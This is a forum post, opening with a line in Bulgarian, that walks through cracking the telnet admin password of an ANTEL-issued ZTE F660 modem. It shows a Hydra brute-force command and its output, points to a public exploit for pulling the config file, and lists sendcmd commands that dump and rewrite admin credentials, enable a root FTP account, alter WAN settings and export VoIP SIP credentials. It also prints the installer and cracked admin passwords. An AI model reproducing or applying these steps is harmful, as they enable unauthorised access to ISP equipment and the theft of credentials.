
Впрочем: bay.uy си го взех да си се кефя на нещо българско и родно оттатък голямата вода

------------------------------------
The case: Cracking telnet (port 23) admin password to gain benefits of "owning" your modem.
Hardware modem provided by ISP: ZTE F660
ISP: ANTEL (Uruguay)
Network: FTTH PON
Situation: The local ISP (ANTEL) provide one user password to access very basic modem features which are:
user | user
...and for the techie install stuff they give another one:
instalador | wwzz2233
which is loaded with a little bit more stuff, but we hack right?!
We need all functionality to belongs to us!
Before researching I try known well hacks without success.
http://192.168.1.1/web_shell_cmd.gch
http://192.168.1.1/hidden_version_switch.gch
http://192.168.1.1/manager_dev_query_t.gch
No way and not work at all!
I run an nmap to find what is running and what ports are open!
(look the provided archive and 10x to Gaston Asudrian for the modem)
So basically this is the proceedment of mine (cleverness is not blindness), but you know that too right!?
Use at your own risk!
1. Found a good Telnet (Bruteforce) Password Cracker.
I use the excellent choice for the job - Hydra
https://github.com/vanhauser-thc/thc-hydra
Yes they wins against medusa and ncrack, but you know that ')
2. Download the Hydra and launch a CMD (command, cli) to the folder containing the hydra.exe
You're still using Microsoft Windows! Aren't you?!
Код за потвърждение: Избери целия код
hydra -l admin -x 1:8:Aa1 telnet://192.168.1.1

3. You need now patience in mine case ~ 3 weeks when recently move to reestablish a whole new fucking life in Uruguay in particular at this time in Montevideo.
Meanwhile I found a lot of information regardess the whole system structure, used hardware equipments and nodes, etc. doesn't matter ')
(I still own a engineer degree on lasers, optics and fine mechanic at all and again look the provided document if you are interested)
Yo-ho-ho and a bottle of rum!
4. Voila! After few weeks finally I've got it and now I can telnet my router and use very cool stuff in the provided BusyBox interface, now let's the hack begin.
5. Meanwhile Daniel Cisa has published his exploit[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.1.1 login: admin password: Ql52jP23
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-17 09:34:06
https://www.exploit-db.com/exploits/36978/
Thanks man with this the rest is much easier!
Firmware: 2.22.21P1T8S
Confirmed that works fine on 2.22.21P1T12S too
The last cracked password was: 5DhD64Je
6. Looking in the provided BIN with HEX editor I found that this binary excellent will be showed as good plain readable database using excellent NirSoft RouterPassView - http://nirsoft.net/utils/router_password_recovery.html
(and yes he fix exactly the problem with ZTE routers on build 1.65)
Run the program and ignore AntiVirus warnings, because you're da real man bro
Drag and drop the config.bin downloaded via the exploitable html which you found in the step above, but you know that too!
This is madness you know I know, NSA know everyone knows ')
So I make a notes here HOW TO and WHY TO make that shits to work for us:
For this research we use the sendcmd command to make manipulation of the "Read-Only" DB system.
Read carefully below and apply at your own risk.
Don't try to explain to your ISP bulshits, because the shitty system logs almost everything and The Guardian is operative, nut you know this too as always ')
This is the command which give us a table which holds the admin password:
Код за потвърждение: Избери целия код
sendcmd 1 DB p TelnetCfg
Код за потвърждение: Избери целия код
sendcmd 1 DB all
Код за потвърждение: Избери целия код
sendcmd 1 DB p TelnetCfg
sendcmd 1 DB set TelnetCfg 0 TS_UName admin
sendcmd 1 DB set TelnetCfg 0 TS_UPwd Ql52jP23
sendcmd 1 DB set TelnetCfg 0 TS_Port "23"
sendcmd 1 DB save
Usefull commands to see a lot of stuff inside the modem:
(I didn't explain it detailed here, because you know it too, sorry ')
Код за потвърждение: Избери целия код
sendcmd 1 DB all
sendcmd 1 DB p TelnetCfg
sendcmd 1 DB p WANC
sendcmd 1 DB p MgtServer
sendcmd 1 DB p VoIPSIPLine all
sendcmd 1 DB p FTPUser
cat /proc/cpuinfo
cat /proc/meminfo
cat /proc/version
cat /proc/cmdline
cat /proc/devices
cat /proc/mtd
cat /proc/cpuinfo
cat /proc/mounts
cat /etc/fstab
nvram show | grep ssid
nvram show | grep wps
nvram config set wl0_wps_config_state=0
nvram show | grep ssid
lsmod
ls /proc
ifconfig
iptables -vL
brctl show
ls kmodule/
df
mount -n -o remount,rw /
With this command, you can convert read-only file system to read-write file system.
To change back read-only file system..
mount -n -o remount,ro /
sendcmd 1 DB p VoIPSIPLine all > /mnt/usb1_1/666_VoIPSIPLine.xml
"/mnt/" >> "/"
sendcmd 1 DB set FTPUser 0 Location /
sendcmd 1 DB save
sendcmd 1 DB set FTPServerCfg 0 FtpEnable 1
sendcmd 1 DB set FTPUser 1 ViewName IGD.FTPUSER1
sendcmd 1 DB set FTPUser 1 Username root
sendcmd 1 DB set FTPUser 1 Password C.O.R.E.
sendcmd 1 DB set FTPUser 1 Location /
sendcmd 1 DB set FTPUser 1 UserRight 1
sendcmd 1 DB save
sendcmd 1 DB set WANC 1 IsNAT 0
sendcmd 1 DB set WANC 1 IsForward 0
sendcmd 1 DB set WANC 1 IsDefGW 0
sendcmd 1 DB save
setmac show
setmac 1 256 XX:XX:XX:XX:XX:XX
cd /mnt/usb1_1
./config.ash
-----------by Pixel PIrate for now----------------